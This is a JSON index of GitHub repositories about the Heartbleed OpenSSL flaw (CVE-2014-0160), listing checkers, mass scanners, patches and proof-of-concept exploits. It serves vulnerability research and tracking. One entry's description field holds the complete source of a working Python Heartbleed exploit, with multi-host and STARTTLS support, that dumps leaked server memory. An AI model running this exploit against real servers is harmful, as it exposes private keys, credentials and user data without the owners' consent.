PoC-in-GitHub/2014/CVE-2014-0160.json
2020-03-14 12:07:06 +09:00

577 lines
No EOL
32 KiB
JSON
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[
{
"id": 18537678,
"name": "Heartbleed",
"full_name": "FiloSottile\/Heartbleed",
"owner": {
"login": "FiloSottile",
"id": 1225294,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1225294?v=4",
"html_url": "https:\/\/github.com\/FiloSottile"
},
"html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed",
"description": "A checker (site and tool) for CVE-2014-0160",
"fork": false,
"created_at": "2014-04-07T23:03:09Z",
"updated_at": "2020-03-13T12:36:43Z",
"pushed_at": "2016-05-07T19:35:14Z",
"stargazers_count": 2241,
"watchers_count": 2241,
"forks_count": 484,
"forks": 484,
"watchers": 2241,
"score": 0
},
{
"id": 18552299,
"name": "patch-openssl-CVE-2014-0160",
"full_name": "jdauphant\/patch-openssl-CVE-2014-0160",
"owner": {
"login": "jdauphant",
"id": 1238254,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/1238254?v=4",
"html_url": "https:\/\/github.com\/jdauphant"
},
"html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160",
"description": "Patch openssl #heartbleed with ansible ",
"fork": false,
"created_at": "2014-04-08T09:19:49Z",
"updated_at": "2019-02-26T03:45:46Z",
"pushed_at": "2014-12-02T12:20:51Z",
"stargazers_count": 18,
"watchers_count": 18,
"forks_count": 8,
"forks": 8,
"watchers": 18,
"score": 0
},
{
"id": 18553786,
"name": "heartbleed-masstest",
"full_name": "musalbas\/heartbleed-masstest",
"owner": {
"login": "musalbas",
"id": 5038597,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5038597?v=4",
"html_url": "https:\/\/github.com\/musalbas"
},
"html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest",
"description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.",
"fork": false,
"created_at": "2014-04-08T10:10:43Z",
"updated_at": "2020-02-18T11:48:04Z",
"pushed_at": "2015-07-02T14:47:31Z",
"stargazers_count": 569,
"watchers_count": 569,
"forks_count": 228,
"forks": 228,
"watchers": 569,
"score": 0
},
{
"id": 18566360,
"name": "pacemaker",
"full_name": "Lekensteyn\/pacemaker",
"owner": {
"login": "Lekensteyn",
"id": 164530,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/164530?v=4",
"html_url": "https:\/\/github.com\/Lekensteyn"
},
"html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker",
"description": "Heartbleed (CVE-2014-0160) client exploit",
"fork": false,
"created_at": "2014-04-08T16:41:51Z",
"updated_at": "2020-03-09T15:27:21Z",
"pushed_at": "2016-01-22T00:42:35Z",
"stargazers_count": 304,
"watchers_count": 304,
"forks_count": 82,
"forks": 82,
"watchers": 304,
"score": 0
},
{
"id": 18603489,
"name": "heartbleed-poc",
"full_name": "sensepost\/heartbleed-poc",
"owner": {
"login": "sensepost",
"id": 1193973,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/1193973?v=4",
"html_url": "https:\/\/github.com\/sensepost"
},
"html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc",
"description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)",
"fork": false,
"created_at": "2014-04-09T15:59:14Z",
"updated_at": "2020-03-05T02:43:34Z",
"pushed_at": "2014-07-10T21:17:22Z",
"stargazers_count": 117,
"watchers_count": 117,
"forks_count": 69,
"forks": 69,
"watchers": 117,
"score": 0
},
{
"id": 18705580,
"name": "heartbleed-dtls",
"full_name": "hreese\/heartbleed-dtls",
"owner": {
"login": "hreese",
"id": 892400,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/892400?v=4",
"html_url": "https:\/\/github.com\/hreese"
},
"html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls",
"description": "POC for CVE-2014-0160 (Heartbleed) for DTLS",
"fork": false,
"created_at": "2014-04-12T14:13:36Z",
"updated_at": "2019-08-13T15:39:32Z",
"pushed_at": "2016-03-26T12:21:03Z",
"stargazers_count": 6,
"watchers_count": 6,
"forks_count": 0,
"forks": 0,
"watchers": 6,
"score": 0
},
{
"id": 18737537,
"name": "heartbleed",
"full_name": "xlucas\/heartbleed",
"owner": {
"login": "xlucas",
"id": 2470398,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/2470398?v=4",
"html_url": "https:\/\/github.com\/xlucas"
},
"html_url": "https:\/\/github.com\/xlucas\/heartbleed",
"description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability",
"fork": false,
"created_at": "2014-04-13T19:18:32Z",
"updated_at": "2018-10-07T00:48:31Z",
"pushed_at": "2015-05-02T08:25:20Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
},
{
"id": 18818122,
"name": "Heartbleed",
"full_name": "mozilla-services\/Heartbleed",
"owner": {
"login": "mozilla-services",
"id": 1066228,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1066228?v=4",
"html_url": "https:\/\/github.com\/mozilla-services"
},
"html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed",
"description": "A checker (site and tool) for CVE-2014-0160",
"fork": false,
"created_at": "2014-04-15T22:22:18Z",
"updated_at": "2019-05-30T01:17:07Z",
"pushed_at": "2019-03-27T19:51:32Z",
"stargazers_count": 3,
"watchers_count": 3,
"forks_count": 4,
"forks": 4,
"watchers": 3,
"score": 0
},
{
"id": 18935164,
"name": "heartbleed.js",
"full_name": "yryz\/heartbleed.js",
"owner": {
"login": "yryz",
"id": 1646732,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/1646732?v=4",
"html_url": "https:\/\/github.com\/yryz"
},
"html_url": "https:\/\/github.com\/yryz\/heartbleed.js",
"description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ",
"fork": false,
"created_at": "2014-04-19T06:20:44Z",
"updated_at": "2018-07-12T01:37:36Z",
"pushed_at": "2015-04-30T09:25:33Z",
"stargazers_count": 5,
"watchers_count": 5,
"forks_count": 1,
"forks": 1,
"watchers": 5,
"score": 0
},
{
"id": 25109038,
"name": "ssl_scanner",
"full_name": "vortextube\/ssl_scanner",
"owner": {
"login": "vortextube",
"id": 7092728,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/7092728?v=4",
"html_url": "https:\/\/github.com\/vortextube"
},
"html_url": "https:\/\/github.com\/vortextube\/ssl_scanner",
"description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner",
"fork": false,
"created_at": "2014-10-12T05:13:06Z",
"updated_at": "2017-01-18T17:52:53Z",
"pushed_at": "2014-10-12T05:22:07Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 1,
"forks": 1,
"watchers": 1,
"score": 0
},
{
"id": 31863201,
"name": "heartbleed-PoC",
"full_name": "mpgn\/heartbleed-PoC",
"owner": {
"login": "mpgn",
"id": 5891788,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5891788?v=4",
"html_url": "https:\/\/github.com\/mpgn"
},
"html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC",
"description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:",
"fork": false,
"created_at": "2015-03-08T19:54:33Z",
"updated_at": "2020-02-05T02:52:40Z",
"pushed_at": "2015-03-15T17:18:56Z",
"stargazers_count": 31,
"watchers_count": 31,
"forks_count": 19,
"forks": 19,
"watchers": 31,
"score": 0
},
{
"id": 33456758,
"name": "heartbleed.py",
"full_name": "xanas\/heartbleed.py",
"owner": {
"login": "xanas",
"id": 11810462,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/11810462?v=4",
"html_url": "https:\/\/github.com\/xanas"
},
"html_url": "https:\/\/github.com\/xanas\/heartbleed.py",
"description": "#!\/usr\/bin\/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print ' %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print \"Error receiving data: \", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls\/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send(\"EHLO someone.org\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if pop3\/imap supports starttls\/stls elif port in {110, 143}: print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send(\"CAPA\\n\") if port == 143: s.send(\"CAPABILITY\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if ftp supports auth tls\/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send(\"FEAT\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"AUTH TLS\" in check: opts.starttls = True atls = True print \"AUTH TLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send(\"STLS\\n\") elif atls: print 'Sending AUTH TLS Command...' s.send(\"AUTH TLS\\n\") else: print 'Sending STARTTLS Command...' s.send(\"STARTTLS\\n\") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print \"Error connecting to host: \", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, \"r\") for line in fileIN: targetinfo = line.strip().split(\":\") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()",
"fork": false,
"created_at": "2015-04-05T22:03:30Z",
"updated_at": "2018-12-09T17:22:05Z",
"pushed_at": "2015-04-05T22:03:31Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
},
{
"id": 35284258,
"name": "heartbleed",
"full_name": "iSCInc\/heartbleed",
"owner": {
"login": "iSCInc",
"id": 6920447,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/6920447?v=4",
"html_url": "https:\/\/github.com\/iSCInc"
},
"html_url": "https:\/\/github.com\/iSCInc\/heartbleed",
"description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..",
"fork": false,
"created_at": "2015-05-08T14:37:44Z",
"updated_at": "2015-05-15T13:19:04Z",
"pushed_at": "2015-05-15T13:20:41Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 37109043,
"name": "cve-2014-0160-Yunfeng-Jiang",
"full_name": "marstornado\/cve-2014-0160-Yunfeng-Jiang",
"owner": {
"login": "marstornado",
"id": 1574834,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1574834?v=4",
"html_url": "https:\/\/github.com\/marstornado"
},
"html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang",
"description": null,
"fork": false,
"created_at": "2015-06-09T03:55:14Z",
"updated_at": "2015-06-09T04:03:10Z",
"pushed_at": "2015-06-09T04:14:11Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{
"id": 38980774,
"name": "vaas-cve-2014-0160",
"full_name": "hmlio\/vaas-cve-2014-0160",
"owner": {
"login": "hmlio",
"id": 11684719,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/11684719?v=4",
"html_url": "https:\/\/github.com\/hmlio"
},
"html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160",
"description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed",
"fork": false,
"created_at": "2015-07-12T22:40:54Z",
"updated_at": "2019-12-03T22:35:19Z",
"pushed_at": "2019-10-08T10:03:04Z",
"stargazers_count": 10,
"watchers_count": 10,
"forks_count": 6,
"forks": 6,
"watchers": 10,
"score": 0
},
{
"id": 43054972,
"name": "heartbleedscanner",
"full_name": "hybridus\/heartbleedscanner",
"owner": {
"login": "hybridus",
"id": 5206389,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5206389?v=4",
"html_url": "https:\/\/github.com\/hybridus"
},
"html_url": "https:\/\/github.com\/hybridus\/heartbleedscanner",
"description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ",
"fork": false,
"created_at": "2015-09-24T08:39:28Z",
"updated_at": "2020-02-05T07:30:25Z",
"pushed_at": "2015-09-24T16:15:11Z",
"stargazers_count": 14,
"watchers_count": 14,
"forks_count": 10,
"forks": 10,
"watchers": 14,
"score": 0
},
{
"id": 51847934,
"name": "CVE-2014-0160-Chrome-Plugin",
"full_name": "Xyl2k\/CVE-2014-0160-Chrome-Plugin",
"owner": {
"login": "Xyl2k",
"id": 8536299,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/8536299?v=4",
"html_url": "https:\/\/github.com\/Xyl2k"
},
"html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin",
"description": "Heartbleed",
"fork": false,
"created_at": "2016-02-16T15:49:55Z",
"updated_at": "2016-02-16T15:49:55Z",
"pushed_at": "2016-02-16T16:04:33Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 132503722,
"name": "Heartexploit",
"full_name": "kaosV20\/Heartexploit",
"owner": {
"login": "kaosV20",
"id": 36334176,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/36334176?v=4",
"html_url": "https:\/\/github.com\/kaosV20"
},
"html_url": "https:\/\/github.com\/kaosV20\/Heartexploit",
"description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.",
"fork": false,
"created_at": "2018-05-07T18:55:19Z",
"updated_at": "2018-05-07T19:33:43Z",
"pushed_at": "2018-05-07T19:11:20Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{
"id": 156641077,
"name": "OpenSSL-HeartBleed-CVE-2014-0160-PoC",
"full_name": "caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
"owner": {
"login": "caiqiqi",
"id": 8278315,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/8278315?v=4",
"html_url": "https:\/\/github.com\/caiqiqi"
},
"html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
"description": "来自https:\/\/www.freebuf.com\/articles\/web\/31700.html",
"fork": false,
"created_at": "2018-11-08T02:50:28Z",
"updated_at": "2018-11-08T02:51:58Z",
"pushed_at": "2018-11-08T02:51:56Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 3,
"forks": 3,
"watchers": 0,
"score": 0
},
{
"id": 161246011,
"name": "HeartBleed",
"full_name": "Saymeis\/HeartBleed",
"owner": {
"login": "Saymeis",
"id": 42687972,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/42687972?v=4",
"html_url": "https:\/\/github.com\/Saymeis"
},
"html_url": "https:\/\/github.com\/Saymeis\/HeartBleed",
"description": "CVE-2014-0160",
"fork": false,
"created_at": "2018-12-10T22:42:51Z",
"updated_at": "2019-07-31T23:10:49Z",
"pushed_at": "2019-05-19T15:13:33Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
},
{
"id": 164344882,
"name": "cve-2014-0160",
"full_name": "cved-sources\/cve-2014-0160",
"owner": {
"login": "cved-sources",
"id": 46423677,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/46423677?v=4",
"html_url": "https:\/\/github.com\/cved-sources"
},
"html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160",
"description": "cve-2014-0160",
"fork": false,
"created_at": "2019-01-06T20:57:53Z",
"updated_at": "2019-01-06T20:59:30Z",
"pushed_at": "2019-01-06T20:59:29Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 2,
"forks": 2,
"watchers": 0,
"score": 0
},
{
"id": 172987767,
"name": "heartbleed",
"full_name": "cheese-hub\/heartbleed",
"owner": {
"login": "cheese-hub",
"id": 41589726,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/41589726?v=4",
"html_url": "https:\/\/github.com\/cheese-hub"
},
"html_url": "https:\/\/github.com\/cheese-hub\/heartbleed",
"description": "Demonstration of the Heartbleed Bug CVE-2014-0160",
"fork": false,
"created_at": "2019-02-27T20:46:41Z",
"updated_at": "2019-06-27T13:00:13Z",
"pushed_at": "2019-06-27T13:00:11Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 2,
"forks": 2,
"watchers": 0,
"score": 0
},
{
"id": 179123466,
"name": "cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
"full_name": "artofscripting\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
"owner": {
"login": "artofscripting",
"id": 1545672,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1545672?v=4",
"html_url": "https:\/\/github.com\/artofscripting"
},
"html_url": "https:\/\/github.com\/artofscripting\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
"description": null,
"fork": false,
"created_at": "2019-04-02T17:08:01Z",
"updated_at": "2019-04-02T18:11:08Z",
"pushed_at": "2019-04-02T18:11:07Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{
"id": 179373566,
"name": "heartbleed-bug",
"full_name": "cldme\/heartbleed-bug",
"owner": {
"login": "cldme",
"id": 10621824,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/10621824?v=4",
"html_url": "https:\/\/github.com\/cldme"
},
"html_url": "https:\/\/github.com\/cldme\/heartbleed-bug",
"description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔",
"fork": false,
"created_at": "2019-04-03T21:32:50Z",
"updated_at": "2019-04-10T16:42:44Z",
"pushed_at": "2019-04-10T16:42:43Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 234023877,
"name": "heartbleed_fix_updated",
"full_name": "hack3r-0m\/heartbleed_fix_updated",
"owner": {
"login": "hack3r-0m",
"id": 54898623,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/54898623?v=4",
"html_url": "https:\/\/github.com\/hack3r-0m"
},
"html_url": "https:\/\/github.com\/hack3r-0m\/heartbleed_fix_updated",
"description": "updating services to fix Heart-bleed bug (CVE-2014-0160)",
"fork": false,
"created_at": "2020-01-15T07:31:04Z",
"updated_at": "2020-01-16T04:24:29Z",
"pushed_at": "2020-01-16T04:24:27Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]